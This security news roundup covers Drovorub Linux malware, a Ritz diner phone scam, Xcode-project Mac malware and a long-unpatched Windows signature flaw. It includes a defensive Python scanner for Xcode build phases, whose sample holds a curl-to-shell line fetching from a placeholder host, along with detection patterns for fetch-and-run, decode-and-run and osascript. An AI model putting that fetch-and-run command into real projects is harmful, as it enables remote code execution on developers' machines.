This Week In Security - 08/24/2020

Last updated on August 24, 2020

Linux Malware Could Jeopardize US National Security

The Federal Bureau of Investigation (FBI) and the National Security Agency (NSA) released a joint report last week warning that Russian state hackers are “deploying previously undisclosed malware for Linux® systems, called Drovorub” to “infiltrate sensitive networks, steal confidential information, and execute malicious commands”.

Steve Grobman, the CTO of the computer security software company McAfee, described Drovorub as “a ‘swiss-army-knife’ of capabilities that allows the attacker to perform many different functions, such as stealing files and remote controlling the victim’s computer”.

The report alleges that “the malware has been used in unspecified cyber-espionage operations that it has tied to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS)”.

The Drovorub malware is also believed to be linked to “the Russian threat group Fancy Bear (also known as APT28, Strontium, and Sofacy)”.

The advisory is considered required reading for all US organizations and businesses running a Linux system. According to Grobman, the “objectives of Drovorub… could range from industrial espionage to election interference”.

He went on to say, “Technical details released today by the NSA and FBI on APT28’s Drovorub toolset are highly valuable to cyber defenders across the United States” which, he added, is “a target-rich environment for potential cyber-attacks”.

Ritz Diners Scammed After Probable Data Breach

Diners at the prestigious Ritz Hotel have been scammed for payment card details following a “potential data breach within the hotel’s food and beverage reservation system”.

Posing as hotel staff, the scammers contacted people with bookings at the hotel, giving them precise details of their reservations before asking them to divulge their payment card details over the phone.

In what has been described as “a very sophisticated scam”, the fraudsters also managed to spoof the Ritz’s phone number, making it appear as though the calls were coming from the hotel itself.

The Ritz has since confirmed that “on 12th August 2020, we were aware of a potential data breach within our food and beverage reservation system, which may have compromised some of our clients’ personal data”.

The hotel chain also said, “We immediately launched an investigation to identify the cause of the breach, which is ongoing, to find out what happened, how and to prevent this from happening again”.

Unfortunately, the Ritz’s response wasn’t fast enough, as “the attackers lost no time capitalizing on the stolen customer data”.

Furthermore, as Jessica Barker, of the cybersecurity company Cygenta, points out, “when a scam like this involves insider information it adds an air of legitimacy and authority”.

Mac Malware Corrupts Apps at Source

Seemingly benign open-source projects are being infected with malware “that contains two previously unseen zero-day exploits”.

According to a white paper published by Trend Micro, the source malware… leads to a rabbit hole of malicious payloads. The malware targets the users’ web browser app and, with Safari for instance, “downloads and installs a malicious version of Safari and makes sure any internal links to the real Safari go to the fake one instead”.

Although the malware itself is dangerous, what’s even more worrying is “the novel way it sneaks onto a user’s device”. The “malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run”.

Software developers may be unaware of the presence of the malicious code and “release the applications with their own authorized signatures”, therefore “the infected apps will not always be stopped by Apple’s own built-in security safeguards”.
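As an added illustration of the check a developer or code reviewer can run for the build-phase injection described above (example code written for this post, not from Trend Micro’s paper or any project; the project file excerpt and the indicator patterns are constructed assumptions), this script lists every Run Script phase in a project.pbxproj and flags the ones that fetch and execute remote content or decode and run embedded data:

```python
import re

# Constructed project.pbxproj excerpt (not from a real project): one Run Script
# phase that pipes a remote download into a shell, one ordinary lint step.
SAMPLE_PBXPROJ = r'''
		AB12 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellScript = "curl -fsSL https://example.invalid/setup.sh | sh\n";
		};
		CD34 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			name = "SwiftLint";
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
'''

# Review heuristics: label -> pattern a lint or codegen step would not normally contain.
INDICATORS = {
    "fetch-pipe-to-shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"),
    "decode-and-run": re.compile(r"base64\s+(-d|--decode)|xxd\s+-r|\beval\b"),
    "applescript": re.compile(r"\bosascript\b"),
}
_ISA = re.compile(r"isa\s*=\s*PBXShellScriptBuildPhase;")
_NAME = re.compile(r'\bname\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;]+));')
_SCRIPT = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)";')

def _unescape(s):
    """Decode pbxproj backslash escapes (newline, tab, quote, backslash)."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)

def extract_script_phases(pbxproj):
    """Return [(name, script)] for every PBXShellScriptBuildPhase object in the file text."""
    phases = []
    for m in _ISA.finditer(pbxproj):
        body = pbxproj[m.end():pbxproj.find("};", m.end())]  # remainder of this object
        name_m, script_m = _NAME.search(body), _SCRIPT.search(body)
        name = (name_m.group(1) or name_m.group(2)).strip() if name_m else "(unnamed)"
        phases.append((name, _unescape(script_m.group(1)) if script_m else ""))
    return phases

def suspicious_phases(pbxproj):
    """Return [(name, script, [labels])] for phases matching any indicator; empty list if none."""
    flagged = []
    for name, script in extract_script_phases(pbxproj):
        hits = [label for label, rx in INDICATORS.items() if rx.search(script)]
        if hits:
            flagged.append((name, script, hits))
    return flagged
```

Run it against `project.pbxproj` inside any `.xcodeproj` bundle you did not author yourself; a phase that is flagged deserves a read before the project is built, since the build step runs with the developer’s own privileges.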

To prevent this “devilishly clever” malware from infecting your Mac, you should only download apps from official app stores and make sure you have anti-virus software both installed and updated.

Microsoft Finally Patches Two-Year-Old Vulnerability

On August 11’s Patch Tuesday, Microsoft finally plugged a security flaw in Microsoft Windows – “after it had been actively exploited in malware attacks for two years”.

The security hole, known as CVE-2020-1464, was patched earlier this month, resolving an ongoing “problem with the way every supported version of Windows validates digital signatures”.

Microsoft said the spoofing vulnerability could be used “to bypass security features intended to prevent improperly signed files from being loaded”.

It is unknown whether security researchers within the company had been informed of the flaw which “was first spotted in attacks used in the wild back in August 2018”.

Bernardo Quintero, of the malware detection company VirusTotal, said he had alerted Microsoft to the vulnerability in January 2019 and that, while “Microsoft’s security team validated his findings, the company chose not to address the problem at the time”.

According to cybersecurity researcher Tal Be’ery, when a file known as GlueBall abused the vulnerability back in 2018, “It was very clear to everyone involved, Microsoft included, that GlueBall is indeed a valid vulnerability exploited in the wild. Therefore, it is not clear why it was only patched now and not two years ago”.